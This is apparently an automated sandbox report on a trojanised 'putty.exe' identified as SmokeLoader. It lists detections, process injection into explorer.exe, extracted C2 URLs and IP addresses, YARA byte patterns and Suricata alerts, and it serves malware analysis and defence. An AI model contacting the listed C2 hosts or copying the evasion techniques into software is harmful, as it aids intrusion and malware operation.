Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
putty.exe

Overview

General Information

Sample name:putty.exe
Analysis ID:1578162
MD5:3bbac642557b0ab934addbac0594561c
SHA1:0787a06f1fff51bdfdb129186df44e73d8c7d5de
SHA256:bc887fcd6805824ac58a107917c6d083056d688eef39e979da25d16eb388e798
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • putty.exe (PID: 6380 cmdline: "C:\Users\user\Desktop\putty.exe" MD5: 3BBAC642557B0AB934ADDBAC0594561C)
    • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • hajefwb (PID: 7112 cmdline: C:\Users\user\AppData\Roaming\hajefwb MD5: 3BBAC642557B0AB934ADDBAC0594561C)
  • hajefwb (PID: 3648 cmdline: C:\Users\user\AppData\Roaming\hajefwb MD5: 3BBAC642557B0AB934ADDBAC0594561C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://constractionscity1991.lat/", "http://restructurisationservice.ru/", "http://connecticutproperty.ru/"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2177513700.0000000002471000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000000.00000002.2177513700.0000000002471000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x204:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000004.00000002.2439563956.00000000009E1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000004.00000002.2439563956.00000000009E1000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x204:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      00000004.00000002.2439322888.0000000000880000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      Click to see the 9 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.3.hajefwb.890000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        4.2.hajefwb.880e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          0.2.putty.exe.940e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            0.3.putty.exe.950000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              4.2.hajefwb.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                Click to see the 1 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Execution of Suspicious File Type Extension
                Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\hajefwb, CommandLine: C:\Users\user\AppData\Roaming\hajefwb, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\hajefwb, NewProcessName: C:\Users\user\AppData\Roaming\hajefwb, OriginalFileName: C:\Users\user\AppData\Roaming\hajefwb, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\hajefwb, ProcessId: 7112, ProcessName: hajefwb

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-19T10:58:12.359414+010020391031A Network Trojan was detected192.168.2.54973594.156.177.5180TCP
                2024-12-19T10:58:14.531297+010020391031A Network Trojan was detected192.168.2.54974194.156.177.5180TCP
                2024-12-19T10:58:16.781269+010020391031A Network Trojan was detected192.168.2.549747194.85.61.7680TCP
                2024-12-19T10:59:22.905776+010020391031A Network Trojan was detected192.168.2.54989794.156.177.5180TCP
                2024-12-19T10:59:24.608903+010020391031A Network Trojan was detected192.168.2.54990294.156.177.5180TCP
                2024-12-19T10:59:26.108877+010020391031A Network Trojan was detected192.168.2.549908194.85.61.7680TCP
                2024-12-19T10:59:27.827648+010020391031A Network Trojan was detected192.168.2.54991494.156.177.5180TCP
                2024-12-19T10:59:29.405803+010020391031A Network Trojan was detected192.168.2.54991594.156.177.5180TCP
                2024-12-19T10:59:30.843229+010020391031A Network Trojan was detected192.168.2.549920194.85.61.7680TCP
                2024-12-19T10:59:32.436950+010020391031A Network Trojan was detected192.168.2.54992694.156.177.5180TCP
                2024-12-19T10:59:33.936950+010020391031A Network Trojan was detected192.168.2.54992894.156.177.5180TCP
                2024-12-19T10:59:35.406095+010020391031A Network Trojan was detected192.168.2.549933194.85.61.7680TCP
                2024-12-19T10:59:37.327557+010020391031A Network Trojan was detected192.168.2.54993994.156.177.5180TCP
                2024-12-19T10:59:38.769169+010020391031A Network Trojan was detected192.168.2.54994294.156.177.5180TCP
                2024-12-19T10:59:40.327545+010020391031A Network Trojan was detected192.168.2.549947194.85.61.7680TCP
                2024-12-19T10:59:42.608756+010020391031A Network Trojan was detected192.168.2.54995394.156.177.5180TCP
                2024-12-19T10:59:44.093134+010020391031A Network Trojan was detected192.168.2.54995894.156.177.5180TCP
                2024-12-19T10:59:45.593136+010020391031A Network Trojan was detected192.168.2.549964194.85.61.7680TCP
                2024-12-19T10:59:48.139987+010020391031A Network Trojan was detected192.168.2.54997094.156.177.5180TCP
                2024-12-19T10:59:49.530677+010020391031A Network Trojan was detected192.168.2.54997394.156.177.5180TCP
                2024-12-19T10:59:50.905589+010020391031A Network Trojan was detected192.168.2.549977194.85.61.7680TCP
                2024-12-19T10:59:56.702432+010020391031A Network Trojan was detected192.168.2.54999394.156.177.5180TCP
                2024-12-19T10:59:58.202555+010020391031A Network Trojan was detected192.168.2.54999594.156.177.5180TCP
                2024-12-19T10:59:59.640179+010020391031A Network Trojan was detected192.168.2.550000194.85.61.7680TCP
                2024-12-19T11:00:06.342983+010020391031A Network Trojan was detected192.168.2.55000194.156.177.5180TCP
                2024-12-19T11:00:07.905516+010020391031A Network Trojan was detected192.168.2.55000294.156.177.5180TCP
                2024-12-19T11:00:09.405517+010020391031A Network Trojan was detected192.168.2.550003194.85.61.7680TCP
                2024-12-19T11:00:15.530466+010020391031A Network Trojan was detected192.168.2.55000494.156.177.5180TCP
                2024-12-19T11:00:17.108580+010020391031A Network Trojan was detected192.168.2.55000594.156.177.5180TCP
                2024-12-19T11:00:18.608576+010020391031A Network Trojan was detected192.168.2.550006194.85.61.7680TCP
                2024-12-19T11:00:23.702267+010020391031A Network Trojan was detected192.168.2.55000794.156.177.5180TCP
                2024-12-19T11:00:25.139893+010020391031A Network Trojan was detected192.168.2.55000894.156.177.5180TCP
                2024-12-19T11:00:26.639752+010020391031A Network Trojan was detected192.168.2.550009194.85.61.7680TCP
                2024-12-19T11:00:31.936600+010020391031A Network Trojan was detected192.168.2.55001094.156.177.5180TCP
                2024-12-19T11:00:33.608454+010020391031A Network Trojan was detected192.168.2.55001194.156.177.5180TCP
                2024-12-19T11:00:35.030325+010020391031A Network Trojan was detected192.168.2.550012194.85.61.7680TCP
                2024-12-19T11:00:40.639665+010020391031A Network Trojan was detected192.168.2.55001394.156.177.5180TCP
                2024-12-19T11:00:42.092793+010020391031A Network Trojan was detected192.168.2.55001494.156.177.5180TCP
                2024-12-19T11:00:43.608439+010020391031A Network Trojan was detected192.168.2.550015194.85.61.7680TCP
                2024-12-19T11:00:49.327252+010020391031A Network Trojan was detected192.168.2.55001694.156.177.5180TCP
                2024-12-19T11:00:50.795846+010020391031A Network Trojan was detected192.168.2.55001794.156.177.5180TCP
                2024-12-19T11:00:52.295850+010020391031A Network Trojan was detected192.168.2.550018194.85.61.7680TCP
                2024-12-19T11:00:58.217739+010020391031A Network Trojan was detected192.168.2.55001994.156.177.5180TCP
                2024-12-19T11:00:59.702081+010020391031A Network Trojan was detected192.168.2.55002094.156.177.5180TCP
                2024-12-19T11:01:01.311427+010020391031A Network Trojan was detected192.168.2.550021194.85.61.7680TCP
                2024-12-19T11:01:06.592651+010020391031A Network Trojan was detected192.168.2.55002294.156.177.5180TCP
                2024-12-19T11:01:08.139529+010020391031A Network Trojan was detected192.168.2.55002394.156.177.5180TCP
                2024-12-19T11:01:09.639518+010020391031A Network Trojan was detected192.168.2.550024194.85.61.7680TCP
                2024-12-19T11:01:15.639488+010020391031A Network Trojan was detected192.168.2.55002594.156.177.5180TCP
                2024-12-19T11:01:17.108246+010020391031A Network Trojan was detected192.168.2.55002694.156.177.5180TCP
                2024-12-19T11:01:18.608254+010020391031A Network Trojan was detected192.168.2.550027194.85.61.7680TCP
                2024-12-19T11:01:24.327004+010020391031A Network Trojan was detected192.168.2.55002894.156.177.5180TCP
                2024-12-19T11:01:25.795658+010020391031A Network Trojan was detected192.168.2.55002994.156.177.5180TCP
                2024-12-19T11:01:27.405068+010020391031A Network Trojan was detected192.168.2.550030194.85.61.7680TCP
                2024-12-19T11:01:32.905000+010020391031A Network Trojan was detected192.168.2.55003194.156.177.5180TCP
                2024-12-19T11:01:34.394096+010020391031A Network Trojan was detected192.168.2.55003294.156.177.5180TCP
                2024-12-19T11:01:35.826874+010020391031A Network Trojan was detected192.168.2.550033194.85.61.7680TCP
                2024-12-19T11:01:41.326839+010020391031A Network Trojan was detected192.168.2.55003494.156.177.5180TCP
                2024-12-19T11:01:43.201831+010020391031A Network Trojan was detected192.168.2.55003594.156.177.5180TCP
                2024-12-19T11:01:44.639355+010020391031A Network Trojan was detected192.168.2.550036194.85.61.7680TCP
                2024-12-19T11:01:51.139377+010020391031A Network Trojan was detected192.168.2.55003794.156.177.5180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-19T10:58:14.531297+010028518151A Network Trojan was detected192.168.2.54974194.156.177.5180TCP
                2024-12-19T10:59:24.608903+010028518151A Network Trojan was detected192.168.2.54990294.156.177.5180TCP
                2024-12-19T10:59:30.843229+010028518151A Network Trojan was detected192.168.2.549920194.85.61.7680TCP
                2024-12-19T10:59:33.936950+010028518151A Network Trojan was detected192.168.2.54992894.156.177.5180TCP
                2024-12-19T10:59:35.406095+010028518151A Network Trojan was detected192.168.2.549933194.85.61.7680TCP
                2024-12-19T10:59:38.769169+010028518151A Network Trojan was detected192.168.2.54994294.156.177.5180TCP
                2024-12-19T10:59:40.327545+010028518151A Network Trojan was detected192.168.2.549947194.85.61.7680TCP
                2024-12-19T10:59:58.202555+010028518151A Network Trojan was detected192.168.2.54999594.156.177.5180TCP
                2024-12-19T10:59:59.640179+010028518151A Network Trojan was detected192.168.2.550000194.85.61.7680TCP
                2024-12-19T11:00:15.530466+010028518151A Network Trojan was detected192.168.2.55000494.156.177.5180TCP
                2024-12-19T11:00:25.139893+010028518151A Network Trojan was detected192.168.2.55000894.156.177.5180TCP
                2024-12-19T11:00:26.639752+010028518151A Network Trojan was detected192.168.2.550009194.85.61.7680TCP
                2024-12-19T11:00:33.608454+010028518151A Network Trojan was detected192.168.2.55001194.156.177.5180TCP
                2024-12-19T11:00:58.217739+010028518151A Network Trojan was detected192.168.2.55001994.156.177.5180TCP
                2024-12-19T11:01:01.311427+010028518151A Network Trojan was detected192.168.2.550021194.85.61.7680TCP
                2024-12-19T11:01:06.592651+010028518151A Network Trojan was detected192.168.2.55002294.156.177.5180TCP
                2024-12-19T11:01:08.139529+010028518151A Network Trojan was detected192.168.2.55002394.156.177.5180TCP
                2024-12-19T11:01:09.639518+010028518151A Network Trojan was detected192.168.2.550024194.85.61.7680TCP
                2024-12-19T11:01:27.405068+010028518151A Network Trojan was detected192.168.2.550030194.85.61.7680TCP
                2024-12-19T11:01:32.905000+010028518151A Network Trojan was detected192.168.2.55003194.156.177.5180TCP
                2024-12-19T11:01:34.394096+010028518151A Network Trojan was detected192.168.2.55003294.156.177.5180TCP
                2024-12-19T11:01:35.826874+010028518151A Network Trojan was detected192.168.2.550033194.85.61.7680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: putty.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://constractionscity1991.lat/Avira URL Cloud: Label: malware
                Source: http://connecticutproperty.ru/Avira URL Cloud: Label: malware
                Source: http://restructurisationservice.ru/Avira URL Cloud: Label: malware
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Roaming\hajefwbAvira: detection malicious, Label: HEUR/AGEN.1312567
                Found malware configuration
                Source: 00000004.00000002.2439353004.0000000000890000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://constractionscity1991.lat/", "http://restructurisationservice.ru/", "http://connecticutproperty.ru/"]}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\hajefwbReversingLabs: Detection: 47%
                Multi AV Scanner detection for submitted file
                Source: putty.exeVirustotal: Detection: 37%Perma Link
                Source: putty.exeReversingLabs: Detection: 47%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\hajefwbJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: putty.exeJoe Sandbox ML: detected
                Source: putty.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\putty.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49735 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49747 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49741 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:49741 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49897 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49902 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49908 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49920 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:49920 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49933 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49928 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49915 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49953 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49926 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:49928 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:49933 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49947 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:49947 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49977 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:49902 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49973 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50000 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:50000 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49993 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50019 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50026 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50028 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50012 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50002 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50015 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50021 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:50021 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50017 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50006 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49970 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50014 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50032 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49964 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50003 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49995 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:50019 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:50032 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49914 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49939 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50035 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50001 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50007 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50016 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:49995 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50020 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50005 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50022 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:50022 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49958 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50010 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50011 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:50011 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50034 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50009 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:50009 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50027 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50036 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50013 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50008 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50025 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50031 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:50008 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:50031 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50024 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:50024 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50018 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50030 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50033 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:50030 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50037 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50029 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49942 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:50033 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:49942 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50004 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:50004 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50023 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:50023 -> 94.156.177.51:80
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeNetwork Connect: 94.156.177.51 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 194.85.61.76 80Jump to behavior
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://constractionscity1991.lat/
                Source: Malware configuration extractorURLs: http://restructurisationservice.ru/
                Source: Malware configuration extractorURLs: http://connecticutproperty.ru/
                Source: Joe Sandbox ViewIP Address: 94.156.177.51 94.156.177.51
